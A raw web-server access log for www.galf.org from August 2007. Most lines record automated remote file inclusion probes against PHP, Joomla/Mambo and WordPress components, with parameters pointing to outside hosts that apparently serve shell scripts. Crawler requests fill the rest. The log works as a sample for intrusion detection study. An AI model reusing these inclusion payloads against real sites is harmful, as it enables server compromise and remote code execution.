212.191.172.5 - - [12/Aug/2007:17:01:21 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://sslsystem.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
217.153.136.115 - - [12/Aug/2007:17:01:55 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://rpgnet.com/newrpgnet/intranet/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
217.153.136.115 - - [12/Aug/2007:17:01:56 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://rpgnet.com/newrpgnet/intranet/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
38.99.13.122 - - [12/Aug/2007:17:02:42 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuill.com/twiceler/robot.html)" "galf.org"
85.159.90.224 - - [12/Aug/2007:17:03:00 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/cmd.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
85.159.90.224 - - [12/Aug/2007:17:03:05 -0700] "GET /modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/cmd.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.806"
217.115.112.72 - - [12/Aug/2007:17:03:21 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
217.115.112.72 - - [12/Aug/2007:17:03:21 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
212.191.172.5 - - [12/Aug/2007:17:05:55 -0700] "GET /index1.php?go=http://sslsystem.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
212.191.172.5 - - [12/Aug/2007:17:05:55 -0700] "GET /logs/index1.php?go=http://sslsystem.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
67.18.122.210 - - [12/Aug/2007:17:06:48 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.freewebtown.com/nusay/1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
217.151.228.18 - - [12/Aug/2007:17:07:06 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://sslsystem.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.159.90.224 - - [12/Aug/2007:17:07:24 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/cmd.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
85.159.90.224 - - [12/Aug/2007:17:07:25 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/cmd.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
208.36.144.9 - - [12/Aug/2007:17:09:50 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuill.com/twiceler/robot.html)" "www.galf.org"
85.10.199.229 - - [12/Aug/2007:17:15:50 -0700] "GET /index1.php?go=http://sslsystem.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.10.199.229 - - [12/Aug/2007:17:15:51 -0700] "GET /logs/index1.php?go=http://sslsystem.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
217.153.136.115 - - [12/Aug/2007:17:16:35 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://rpgnet.com/newrpgnet/intranet/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
74.6.70.60 - - [12/Aug/2007:17:16:55 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
62.233.147.234 - - [12/Aug/2007:17:17:02 -0700] "GET /logs/index.php?pag=http://ircd.za.pl/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.233.147.234 - - [12/Aug/2007:17:17:03 -0700] "GET /index.php?pag=http://ircd.za.pl/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
74.6.19.80 - - [12/Aug/2007:17:17:03 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
74.6.28.220 - - [12/Aug/2007:17:17:03 -0700] "GET /cendoc/ HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.17.231 - - [12/Aug/2007:17:18:04 -0700] "GET /tmp/?M=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
195.201.109.6 - - [12/Aug/2007:17:18:55 -0700] "GET /logs/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
195.201.109.6 - - [12/Aug/2007:17:18:56 -0700] "GET /program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
207.210.102.125 - - [12/Aug/2007:17:18:58 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://sslsystem.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.22.90.110 - - [12/Aug/2007:17:19:54 -0700] "GET /logs/index2.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.22.90.110 - - [12/Aug/2007:17:19:54 -0700] "GET /index2.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
207.210.102.125 - - [12/Aug/2007:17:21:02 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://sslsystem.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
207.210.102.125 - - [12/Aug/2007:17:21:12 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://sslsystem.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.159.90.224 - - [12/Aug/2007:17:21:59 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/cmd.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
85.159.90.224 - - [12/Aug/2007:17:22:00 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/cmd.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
74.6.17.44 - - [12/Aug/2007:17:22:02 -0700] "GET /logs/ HTTP/1.0" 200 4926 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
212.241.212.188 - - [12/Aug/2007:17:23:21 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.youngpods.org/images/data.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.212.188 - - [12/Aug/2007:17:23:21 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.youngpods.org/images/data.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.125.112.244 - - [12/Aug/2007:17:26:25 -0700] "GET /logs/admin_modules/admin_module_captions.inc.php?http://www.l1nuxgroup.by.ru/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.125.112.244 - - [12/Aug/2007:17:26:25 -0700] "GET /admin_modules/admin_module_captions.inc.php?http://www.l1nuxgroup.by.ru/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
205.234.204.136 - - [12/Aug/2007:17:27:39 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://sslsystem.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.210.102.125 - - [12/Aug/2007:17:28:59 -0700] "GET /index2.php?content=http://sslsystem.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.210.102.125 - - [12/Aug/2007:17:28:59 -0700] "GET /logs/index2.php?content=http://sslsystem.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
212.241.212.188 - - [12/Aug/2007:17:29:11 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.youngpods.org/images/data.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.212.188 - - [12/Aug/2007:17:29:12 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.youngpods.org/images/data.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
202.67.13.218 - - [12/Aug/2007:17:31:49 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
202.67.13.218 - - [12/Aug/2007:17:31:50 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.204.136 - - [12/Aug/2007:17:32:03 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://sslsystem.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.10.199.229 - - [12/Aug/2007:17:32:10 -0700] "GET /index2.php?content=http://sslsystem.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.10.199.229 - - [12/Aug/2007:17:32:10 -0700] "GET /logs/index2.php?content=http://sslsystem.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
205.234.204.136 - - [12/Aug/2007:17:32:33 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://sslsystem.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.210.102.125 - - [12/Aug/2007:17:32:58 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://sslsystem.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.210.102.125 - - [12/Aug/2007:17:33:40 -0700] "GET /index1.php?go=http://sslsystem.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.210.102.125 - - [12/Aug/2007:17:33:40 -0700] "GET /logs/index1.php?go=http://sslsystem.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
212.191.172.5 - - [12/Aug/2007:17:34:02 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://sslsystem.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.18.122.210 - - [12/Aug/2007:17:34:21 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.freewebtown.com/nusay/1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.10.199.229 - - [12/Aug/2007:17:34:28 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://sslsystem.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
217.72.251.90 - - [12/Aug/2007:17:34:59 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://sslsystem.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.210.102.125 - - [12/Aug/2007:17:35:16 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://sslsystem.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
216.127.139.55 - - [12/Aug/2007:17:35:23 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://sslsystem.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.210.102.125 - - [12/Aug/2007:17:35:57 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://sslsystem.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
208.125.112.244 - - [12/Aug/2007:17:36:40 -0700] "GET /logs/access.log/admin_modules/admin_module_captions.inc.php?http://www.l1nuxgroup.by.ru/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.125.112.244 - - [12/Aug/2007:17:36:40 -0700] "GET /logs/access_070730.log/admin_modules/admin_module_captions.inc.php?http://www.l1nuxgroup.by.ru/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.18.122.210 - - [12/Aug/2007:17:39:04 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.freewebtown.com/nusay/1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
217.151.228.18 - - [12/Aug/2007:17:41:27 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://sslsystem.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.210.102.125 - - [12/Aug/2007:17:43:17 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://sslsystem.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.191.162.131 - - [12/Aug/2007:17:44:10 -0700] "GET /logs/index2.php?content=http://www.jicharterhigh.org/Faskalis/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
81.191.162.131 - - [12/Aug/2007:17:44:10 -0700] "GET /index2.php?content=http://www.jicharterhigh.org/Faskalis/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
205.234.204.136 - - [12/Aug/2007:17:44:33 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://sslsystem.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.86.22.67 - - [12/Aug/2007:17:45:47 -0700] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.berlon.com/ide.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
195.201.109.6 - - [12/Aug/2007:17:46:04 -0700] "GET /logs/access.log/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
74.6.71.58 - - [12/Aug/2007:17:46:12 -0700] "GET /logs/?D=A HTTP/1.0" 200 4926 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
85.10.199.229 - - [12/Aug/2007:17:46:32 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://sslsystem.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
212.241.212.188 - - [12/Aug/2007:17:47:24 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.youngpods.org/images/data.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.212.188 - - [12/Aug/2007:17:47:25 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.youngpods.org/images/data.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.125.112.244 - - [12/Aug/2007:17:48:52 -0700] "GET /logs/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.l1nuxgroup.by.ru/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.125.112.244 - - [12/Aug/2007:17:48:52 -0700] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.l1nuxgroup.by.ru/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.10.199.229 - - [12/Aug/2007:17:53:01 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://sslsystem.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
217.151.228.18 - - [12/Aug/2007:17:53:17 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://sslsystem.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
217.153.136.115 - - [12/Aug/2007:17:54:34 -0700] "GET /logs/index2.php?url_page=http://rpgnet.com/newrpgnet/intranet/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
217.153.136.115 - - [12/Aug/2007:17:54:34 -0700] "GET /index2.php?url_page=http://rpgnet.com/newrpgnet/intranet/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
209.59.197.59 - - [12/Aug/2007:17:55:17 -0700] "GET /logs/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
209.59.197.59 - - [12/Aug/2007:17:55:17 -0700] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
85.10.199.229 - - [12/Aug/2007:17:55:29 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://sslsystem.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
195.201.109.6 - - [12/Aug/2007:17:56:19 -0700] "GET /logs/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
195.201.109.6 - - [12/Aug/2007:17:56:19 -0700] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
129.132.190.98 - - [12/Aug/2007:17:57:18 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://lamerma.com.ve/n00gr00d.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
89.207.232.172 - - [12/Aug/2007:17:57:25 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://lamerma.com.ve/n00gr00d.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
85.159.90.224 - - [12/Aug/2007:17:57:25 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/cmd.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
85.159.90.224 - - [12/Aug/2007:17:57:31 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/cmd.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
129.132.190.98 - - [12/Aug/2007:17:58:09 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://lamerma.com.ve/n00gr00d.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.249.10.58 - - [12/Aug/2007:17:58:14 -0700] "GET /logs/http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
66.249.10.58 - - [12/Aug/2007:17:58:14 -0700] "GET /http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
89.207.232.172 - - [12/Aug/2007:17:58:33 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://lamerma.com.ve/n00gr00d.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
212.241.212.188 - - [12/Aug/2007:18:00:01 -0700] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.youngpods.org/images/data.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.212.188 - - [12/Aug/2007:18:00:25 -0700] "GET /logs/access_070723.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.youngpods.org/images/data.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.2.202.117 - - [12/Aug/2007:18:02:07 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.2.202.117 - - [12/Aug/2007:18:02:07 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.132.190.98 - - [12/Aug/2007:18:03:00 -0700] "GET /index.php?go=http://lamerma.com.ve/n00gr00d.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
89.207.232.172 - - [12/Aug/2007:18:03:22 -0700] "GET /index.php?go=http://lamerma.com.ve/n00gr00d.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
200.137.176.133 - - [12/Aug/2007:18:03:39 -0700] "GET /logs/index2.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.137.176.133 - - [12/Aug/2007:18:03:40 -0700] "GET /index2.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.153.136.115 - - [12/Aug/2007:18:03:42 -0700] "GET /logs/access.log/index2.php?url_page=http://rpgnet.com/newrpgnet/intranet/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.199.227.66 - - [12/Aug/2007:18:04:44 -0700] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.humaniora.sdu.dk/gcrg/modules/Downloads_flsmidth/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.199.227.66 - - [12/Aug/2007:18:04:44 -0700] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.humaniora.sdu.dk/gcrg/modules/Downloads_flsmidth/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
217.153.136.115 - - [12/Aug/2007:18:05:14 -0700] "GET /logs/access_070723.log/index2.php?url_page=http://rpgnet.com/newrpgnet/intranet/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
193.138.204.213 - - [12/Aug/2007:18:08:11 -0700] "GET /logs/index.php?id=http://futurehousingsystems.com/images/string.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
193.138.204.213 - - [12/Aug/2007:18:08:12 -0700] "GET /index.php?id=http://futurehousingsystems.com/images/string.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.6.17.114 - - [12/Aug/2007:18:09:01 -0700] "GET /labia/?N=D HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
129.132.190.98 - - [12/Aug/2007:18:09:09 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://lamerma.com.ve/n00gr00d.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
89.207.232.172 - - [12/Aug/2007:18:09:29 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://lamerma.com.ve/n00gr00d.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.249.10.58 - - [12/Aug/2007:18:10:09 -0700] "GET /logs/access_070723.log/http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
83.15.139.164 - - [12/Aug/2007:18:10:29 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
83.15.139.164 - - [12/Aug/2007:18:10:30 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
212.191.172.5 - - [12/Aug/2007:18:10:38 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
67.18.67.4 - - [12/Aug/2007:18:11:25 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.humaniora.sdu.dk/gcrg/modules/Downloads_flsmidth/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.18.67.4 - - [12/Aug/2007:18:11:25 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.humaniora.sdu.dk/gcrg/modules/Downloads_flsmidth/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.18.67.4 - - [12/Aug/2007:18:11:30 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.humaniora.sdu.dk/gcrg/modules/Downloads_flsmidth/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.18.67.4 - - [12/Aug/2007:18:11:30 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.humaniora.sdu.dk/gcrg/modules/Downloads_flsmidth/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.6.17.204 - - [12/Aug/2007:18:12:14 -0700] "GET /labia/?D=A HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
217.72.251.90 - - [12/Aug/2007:18:12:47 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://sslsystem.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
217.72.251.90 - - [12/Aug/2007:18:14:20 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://sslsystem.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.6.18.100 - - [12/Aug/2007:18:14:45 -0700] "GET /tmp/?S=D HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
212.191.172.5 - - [12/Aug/2007:18:16:44 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
212.191.172.5 - - [12/Aug/2007:18:16:44 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
38.118.74.79 - - [12/Aug/2007:18:16:44 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
74.6.25.102 - - [12/Aug/2007:18:18:20 -0700] "GET /tmp/?N=D HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
65.55.208.233 - - [12/Aug/2007:18:19:58 -0700] "GET /?D=D HTTP/1.0" 200 1032 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
212.241.212.188 - - [12/Aug/2007:18:20:52 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.youngpods.org/images/data.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
